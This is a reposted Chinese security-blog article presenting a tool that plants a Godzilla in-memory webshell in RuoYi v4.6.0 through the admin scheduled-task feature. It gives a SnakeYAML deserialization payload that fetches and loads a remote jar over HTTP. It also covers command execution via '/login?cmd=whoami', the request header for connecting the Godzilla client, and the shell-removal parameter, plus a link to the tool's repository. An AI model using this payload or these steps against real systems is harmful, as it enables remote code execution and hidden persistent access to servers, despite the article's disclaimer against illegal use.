ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

admin 2024年3月1日18:31:47评论45 views字数 681阅读2分16秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

ruoyi 后台定时任务注入哥斯拉内存马。

0x02 安装与使用

一、测试环境
ruoyi v4.6.0
二、用法
使用 mvn clean package 打包生成 jar,或者直接下载 release 中的 jar,放在 web 路径下

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

ruoyi 后台创建定时任务

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

payload

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [  !!java.net.URLClassLoader [[    !!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]   ]]]')

执行定时任务

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

web 服务器接受到请求ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

执行命令 /login?cmd=whoami

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

哥斯拉连接,需要配置请求头 X-Cmd-Ruoyi: 任意字符串

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

连接地址 /login?cmd=1,有 cmd 参数即可

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

删除内存马 /login?cmd=delete

0x03 项目链接下载
https://github.com/M0untainShley/yaml-payload-for-ruoyi-godzilla

原文始发于微信公众号(Web安全工具库):ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月1日18:31:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)http://cn-sec.com/archives/2539650.html

发表评论

匿名网友 填写信息